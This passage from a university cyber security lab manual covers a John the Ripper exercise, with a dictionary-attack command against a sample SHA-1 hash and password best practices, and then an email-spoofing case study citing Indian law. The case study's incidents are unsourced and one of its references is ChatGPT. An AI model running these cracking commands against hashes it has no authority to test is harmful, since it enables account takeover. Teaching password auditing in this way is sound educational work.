and their methods of operation. By practicing identification, analysis, and removal techniques, we
gained valuable skills in detecting and mitigating keylogger attacks, enhancing computer security.
Cyber Security (3150714)
Rubrics:

Criteria 1 2 3 4 5 6 Total
Marks

Faculty Signature
Cyber Security (3150714)
Experiment No: 08
Perform password cracking using John the Ripper (JtR).
Date:

Relevant CO:

Objectives:
• Identify the type and format of the password hashes to be cracked.
• Install and configure John the Ripper on a suitable system.
• Use various modes and options of John the Ripper to crack the password hashes.
• Analyze and report the results of the password cracking process.
• Evaluate the strength and security of the passwords and suggest improvements.

John the Ripper

John the Ripper (JtR) is a popular password-cracking tool. John supports many encryption
technologies for Windows and Unix systems (Mac included).
One remarkable feature of John is that it can autodetect the encryption for common formats. This
will save you a lot of time in researching the hash formats and finding the correct tool to crack them.
John is also a dictionary-based tool. This means that it works with a dictionary of common
passwords to compare it with the hash in hand. Here is a common password list called rockyou.txt
(https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz).

This is how John works by default:

• recognize the hash type of the current hash.
• generate hashes on the fly for all the passwords in the dictionary.
• stop when a generated hash matches the current hash.
This is not the only way John finds a password. You can also customize John based on your
requirements. For example, you can specify the password format using the —— format flag.

How to Install John the Ripper

sudo apt install john

How to Use John the Ripper

Now that we know what John is, let's look at the three models it offers you. You will be using one
of these three for most of your use cases.
• Single crack mode
• Wordlist mode (Dictionary Mode)
• Incremental mode

Dictionary Mode:
In dictionary mode, we will provide John with a list of passwords. John will generate hashes for
these on the fly and compare them with our password hash.

For this example, we will use the RockYou wordlist. If you are using Kali, you can find it at
/usr/share/wordlists/rockyou.txt. We will also have a crack.txt file with just the password hash.

edba955d0ea15fdef4f61726ef97e5af507430c0
Cyber Security (3150714)

Here is the command to run John in dictionary mode using the wordlist.

$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 crack.txt

And John finds the password quickly.

The weaker the password is, the quicker John can figure it out. This is why it is always
recommended to have strong passwords.

For more information visit: https://www.freecodecamp.org/news/crack-passwords-using-john-the-

ripper-pentesting-tutorial/
Cyber Security (3150714)

What are the best practices for Secure Password?

Some best practices for ensuring secure passwords:
1. Use Long Passwords: A secure password should be at least 12–16 characters long, with
more being preferable.
2. Include a Mix of Characters: Combine uppercase letters, lowercase letters, numbers, and
special characters (e.g., @, #, $, !).
3. Avoid Predictable Patterns: Avoid using easily guessed information like your name,
birth date, or common words. Passwords should not include keyboard patterns (e.g., "123456",
"qwerty").
4. Use a Password Manager: A password manager can generate and store complex passwords
for you, making it easier to maintain secure, unique passwords for different accounts.
5. Enable Two-Factor Authentication (2FA): Use 2FA wherever possible. This adds an extra
layer of security beyond just the password.
6. Avoid Reusing Passwords: Each account should have a unique password to minimize risk in
case of a breach.
7. Regularly Update Passwords: Change passwords periodically, especially after security breaches.
8. Don't Share Passwords: Never share passwords over email, chat, or other insecure methods. If
sharing is necessary, use secure means like a password manager's sharing feature.

By following these practices, you can significantly improve password security and reduce the
chances of unauthorized access.
 Cyber Security (3150714)
References:

• https://www.freecodecamp.org/news/crack-passwords-using-john-the-ripper-pentesting-tutorial/
• https://www.geeksforgeeks.org/how-to-install-john-the-ripper-on-windows/
• https://www.openwall.com/john/

Conclusion:

This experiment successfully explored the password cracking tool John the Ripper
(JtR). We learned how to identify hash types, install and configure JtR, and use
different cracking modes (single, dictionary, incremental). By cracking password
hashes and analyzing the results, we gained insights into password strength and
security vulnerabilities. This knowledge is crucial for implementing robust
password policies and protecting against unauthorized access.
Cyber Security (3150714)
Rubrics:

Criteria 1 2 3 4 5 6 Total
Marks

Faculty Signature
Cyber Security (3150714)
Experiment No: 09
Consider a case study of cybercrime, where the attacker has performed Cyber
Crime. Prepare a report and list the laws that will be implemented on
attackers.
Date:

Relevant CO:

Objectives:
• Identify the type and motive of the cybercrime and the attacker involved in the case study.
• Analyze the impact and damage caused by cybercrime on the victim and society.
• Research and cite the relevant laws and provisions that apply to the cybercrime and the
attacker in India.
• Prepare a report that summarizes the case study, the analysis, and the legal implications of
cybercrime.
• Recommend preventive measures and best practices to avoid or mitigate such cybercrimes
in the future.

Consider any one of the cybercrimes for the case study and prepare report on it:

FOLLOWING ARE SOME OF THE EXAMPLE OF CASE STUDIES. YOU CAN SELECT
ANY OTHER CASE STUDY AS WELL AND PREPARE A REPORT ON IT.

• The Colonial Pipeline ransomware attack in May 2021, which disrupted the fuel supply
in the US and prompted the government to declare an emergency. The attack was carried
out by the DarkSide ransomware gang, which later went into hiding and faced law
enforcement action.
• The Kaseya ransomware heist in July 2021, which affected over 1,000 businesses whose
IT systems were locked after the REvil ransomware gang compromised the services
provider Kaseya. The gang demanded a cumulative $70m ransom payment and later
disappeared from the internet.
• The Irish Health Service Executive ransomware attack in May 2021, which encrypted
the systems of the healthcare provider and disrupted its services amid the Covid-19
pandemic. The attack was carried out by the Conti ransomware gang, which later released a
decryption tool after facing public backlash.
• The Shreya Singhal v. UOI case in 2015, which challenged the constitutionality of Section
66A of the Information Technology Act, 2000, which criminalized sending
offensive or annoying messages online. The Supreme Court struck down the section as
violative of the freedom of speech and expression.
• The $10 million hack case in 1994, which was one of the first cybercrimes to be prosecuted
in the US. A Russian hacker named Vladimir Levin accessed the accounts of
Citibank customers and transferred millions of dollars to his accomplices’ accounts. He was
later arrested and extradited to the US.
• The Nasscom v. Ajay Sood case in 2005, which was one of the first cases of data theft
and cyber espionage in India. The accused hacked into the database of Nasscom, a trade
association of IT companies, and stole confidential information. He was convicted under
various sections of the IT Act and the Indian Penal Code.
• The Speak Asia Online case in 2011, which was one of the largest online frauds in India.
The company lured millions of people to invest in its online surveys and promised high
returns. However, it turned out to be a Ponzi scheme and duped investors of over Rs 2,000
crore. The case is still under investigation by various agencies.
 Cyber Security (3150714)
• The social media and darknet management by Manipur Police case in 2020, which
showcased how the police used cyber forensics and intelligence to track down and arrest
drug traffickers who were using social media platforms and darknet markets to operate
their illegal business. The case also highlighted the challenges and opportunities for law
enforcement agencies in dealing with cybercrime.

Report: Case study of cybercrime E-Mail Spoofing Instances.

Introduction:

Email spoofing is a growing concern in India, and several instances have been reported in
recent years. In this case study, we will examine some email spoofing instances in India and the
legal implications for the attackers.

About the Fraud:

Instance 1: Bank Fraud

In 2020, a Hyderabad-based man was arrested for allegedly spoofing email addresses of
the Reserve Bank of India (RBI) and several other banks. The attacker sent fraudulent emails to
customers, asking them to update their bank account details, including their ATM PIN and CVV.
The attacker used the information to withdraw money from the victim's accounts. The man was
charged with cheating, forgery, and using a fake identity mark.

Instance 2: Job Offer Scam

In 2019, a man was arrested in Mumbai for sending fake job offer letters to people. The
attacker used spoofed email addresses of well-known companies to send job offers to the
victims. The man charged money from the victims for job placements and disappeared with the
money. He was charged with cheating, forgery, and criminal breach of trust.

Laws implemented on the Attacker:

Email spoofing is a punishable offense in India under the following laws:

The Indian Penal Code (IPC): The IPC includes provisions related to cheating, forgery,
and using a fake identity mark. The attackers in the above instances could be charged with
violating the IPC if they used spoofed email addresses to cheat or deceive the victims.

The Information Technology Act, 2000: The Information Technology Act, 2000, includes
provisions related to unauthorized access to computer systems, data theft, and cyberstalking. The
attackers could be charged with violating the IT Act if they gained unauthorized access to the
victim's computer systems to carry out the email spoofing.

The Payment and Settlement Systems Act, 2007: The Payment and Settlement Systems
Act, 2007, regulates payment systems in India. The attackers could be charged with violating the
Act if they used the victim's financial information for fraudulent activities.
Cyber Security (3150714)

References:

• https://www.studocu.com/in/document/national-institute-of-open-schooling/computer-science/cs-
case-study/53627242
• https://chatgpt.com/

Conclusion:

Email spoofing is a serious crime that can lead to severe legal consequences for the
attackers. It is essential to take preventive measures such as email authentication protocols,
employee training, and advanced security software to prevent email spoofing. Moreover, strict
legal action against the attackers will deter them and others from engaging in such criminal
activities. Indian laws related to cybercrime are stringent, and attackers can face severe legal
penalties for committing email spoofing or any other cybercrime.
Cyber Security (3150714)
Rubrics:

Criteria 1 2 3 4 5 Total
Marks

Faculty Signature